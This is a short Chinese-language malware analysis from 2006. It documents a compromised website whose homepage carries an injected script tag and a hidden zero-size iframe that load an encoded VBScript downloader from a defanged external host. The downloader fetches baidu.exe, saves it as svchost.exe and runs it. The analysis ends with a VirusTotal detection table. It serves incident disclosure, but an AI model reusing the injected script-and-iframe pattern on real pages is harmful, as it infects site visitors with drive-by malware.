endurer 原创
2006-09-21 第1版
该网站首页被加入代码:
/--------
<script language="JavaScript" src="hxxp://www***.zhu**jiang***q*h*.com/images/ad.js"></script>
--------/
ad.js 的内容为:
/--------
document.write("<iframe src=hxxp://www***.zhu**jiang***q*h*.com/images/ad***.htm width=0 height=0></iframe>");
--------/
ad***.htm Kaspersky报为:Trojan-Downloader.VBS.Small.av,瑞星报为 Trojan.DL.VBS.Agent.l,其内容为Encode加密的VBScript脚本代码,利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件会下载 hxxp://www***.zhu**jiang***q*h*.com/images/baidu.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象 的 ShellExecute 方法 来运行。
baidu.exe 瑞星报为 Trojan.DL.Small.tk。
Complete scanning result of "baidu.exe.del", received in VirusTotal at 09.21.2006, 14:50:42 (CET).
| Antivirus | Version | Update | Result |
| AntiVir | 7.2.0.16 | 09.21.2006 | HEUR/Malware |
| Authentium | 4.93.8 | 09.21.2006 | no virus found |
| Avast | 4.7.844.0 | 09.19.2006 | Win32:Tiny-K |
| AVG | 386 | 09.20.2006 | Downloader.Generic.RRD |
| BitDefender | 7.2 | 09.21.2006 | Generic.Malware.dld!!.17ADDB55 |
| CAT-QuickHeal | 8.00 | 09.20.2006 | (Suspicious) - DNAScan |
| ClamAV | devel-20060426 | 09.21.2006 | no virus found |
| DrWeb | 4.33 | 09.21.2006 | Trojan.DownLoader.4554 |
| eTrust-InoculateIT | 23.73.1 | 09.21.2006 | no virus found |
| eTrust-Vet | 30.3.3090 | 09.21.2006 | no virus found |
| Ewido | 4.0 | 09.21.2006 | no virus found |
| Fortinet | 2.82.0.0 | 09.20.2006 | suspicious |
| F-Prot | 3.16f | 09.21.2006 | no virus found |
| F-Prot4 | 4.2.1.29 | 09.21.2006 | no virus found |
| Ikarus | 0.2.65.0 | 09.20.2006 | no virus found |
| Kaspersky | 4.0.2.24 | 09.21.2006 | Trojan-Downloader.Win32.Tiny.y |
| McAfee | 4856 | 09.20.2006 | no virus found |
| Microsoft | 1.1560 | 09.21.2006 | no virus found |
| NOD32v2 | 1.1765 | 09.20.2006 | a variant of Win32/TrojanDownloader.Tiny.Y |
| Norman | 5.90.23 | 09.21.2006 | W32/Suspicious_U.gen |
| Panda | 9.0.0.4 | 09.21.2006 | Suspicious file |
| Sophos | 4.09.0 | 09.21.2006 | no virus found |
| Symantec | 8.0 | 09.21.2006 | no virus found |
| TheHacker | 6.0.1.075 | 09.21.2006 | no virus found |
| UNA | 1.83 | 09.20.2006 | no virus found |
| VBA32 | 3.11.1 | 09.21.2006 | no virus found |
| VirusBuster | 4.3.7:9 | 09.20.2006 | no virus found |
| Aditional Information |
| File size: 1416 bytes |
| MD5: ad492c5aded7310ee2289838622d5827 |
| SHA1: d45b3846691d33cf9374600449688a8c5e2276af |
| packers: UPack |